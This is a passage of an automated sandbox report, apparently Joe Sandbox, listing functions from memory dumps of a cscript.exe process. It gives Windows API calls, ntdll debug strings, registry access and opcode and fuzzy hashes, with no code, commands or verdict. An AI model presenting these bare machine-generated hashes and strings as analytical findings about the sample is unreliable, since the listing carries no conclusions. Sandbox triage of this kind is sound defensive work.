                                                                            • Instruction Fuzzy Hash: 6D51E7B6E00116BFDB10DF988C9097EFBB8BB48244711817AF465D7641EB34FE429BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 8def6c92ec7ccbc3f9529996fedec0ca67a2120dd3ccc83bd523351bbae256d8
                                                                            • Instruction ID: f7c41ca2ba24508c4516dbd497ed636d8a0887b946d3d97639a671046d6bdb61
                                                                            • Opcode Fuzzy Hash: 8def6c92ec7ccbc3f9529996fedec0ca67a2120dd3ccc83bd523351bbae256d8
                                                                            • Instruction Fuzzy Hash: 43512471A00645AFDB34DF5DCC848BFB7F8EF46200B018499E5D6C7681EA74FA028BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F74742
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F74655
                                                                            • Execute=1, xrefs: 04F74713
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F74787
                                                                            • ExecuteOptions, xrefs: 04F746A0
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F74725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F746FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 1e0d7154e12685264fd0523dc9478b8961028f4fa5f8e443ca5c1e35e31c96ed
                                                                            • Instruction ID: 1a923a5de735e195f7926752d02b99fb29fe029497088b57080e01ab3e538dc0
                                                                            • Opcode Fuzzy Hash: 1e0d7154e12685264fd0523dc9478b8961028f4fa5f8e443ca5c1e35e31c96ed
                                                                            • Instruction Fuzzy Hash: CD51E6B1A002197BEB14BBA5DC95FAA77E8EF44305F0440A9E505AB190EB70BA47CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00714930
                                                                            • GetLastError.KERNEL32 ref: 0071493C
                                                                            • GetLastError.KERNEL32 ref: 00714990
                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 007149AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$AddressFreeLibraryProc
                                                                            • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                                            • API String ID: 1171437518-2532474036
                                                                            • Opcode ID: ed69ad2fcdc96c8bc07700a07d81ce56b0b962bc68eea9562263ba8841fe5a4e
                                                                            • Instruction ID: 00ae2a1427629b042a2e4c1526bcfc623aa7eb7d281146528c5f5b1a3ca74cbf
                                                                            • Opcode Fuzzy Hash: ed69ad2fcdc96c8bc07700a07d81ce56b0b962bc68eea9562263ba8841fe5a4e
                                                                            • Instruction Fuzzy Hash: 0A412BB6D013299BCB21CF99C8806DEBBB4BF48710F21422ED945BB380D778AD458B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegSetValueExW.ADVAPI32(?,Timeout,00000000,00000004,?,00000004,?,?,?,0070F129), ref: 0071787B
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Timeout,000000FF,00000000,00000000,00000000,00000000,?,?,?,0070F129), ref: 00717892
                                                                            • GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0071789F
                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,00000004,?,?,?,0070F129), ref: 007178D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Value$ByteCharErrorLastMultiWide
                                                                            • String ID: Timeout
                                                                            • API String ID: 1054387349-1325157390
                                                                            • Opcode ID: 13e5a4cf8a0ba38308403809a1f11c0c71246a55fa6de7ecfb275cd8edb8f162
                                                                            • Instruction ID: 6748a156619ee79223662ded4b32ce3ffa06f44b0546a693398d813675ddde75
                                                                            • Opcode Fuzzy Hash: 13e5a4cf8a0ba38308403809a1f11c0c71246a55fa6de7ecfb275cd8edb8f162
                                                                            • Instruction Fuzzy Hash: F611E170A05214BBD724ABAE8C4DFEB7F7CDF467A0F108124B615D61D0EA789940C7B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction ID: c5f5d954d1de045f0cac52af107a9dc8d764955e2ee1f77ae8dece71a50b95b9
                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction Fuzzy Hash: 58818F70E052499AEF248F68C8917FEBFA2AFC5320F184659D851A7292DF34F843CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 007080BD
                                                                            • __alloca_probe_16.LIBCMT ref: 007103EF
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00710407
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0071043D
                                                                            • GetLastError.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?), ref: 0071044B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                                            • String ID:
                                                                            • API String ID: 3112009249-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04F702E7
                                                                            • RTL: Re-Waiting, xrefs: 04F7031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04F702BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Offset: 00700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_700000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy_s
                                                                            • String ID: WSH
                                                                            • API String ID: 4009619764-2133009938
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04F77B7F
                                                                            • RTL: Re-Waiting, xrefs: 04F77BAC
                                                                            • RTL: Resource at %p, xrefs: 04F77B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F7728C
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 04F772C1
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04F77294
                                                                            • RTL: Resource at %p, xrefs: 04F772A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%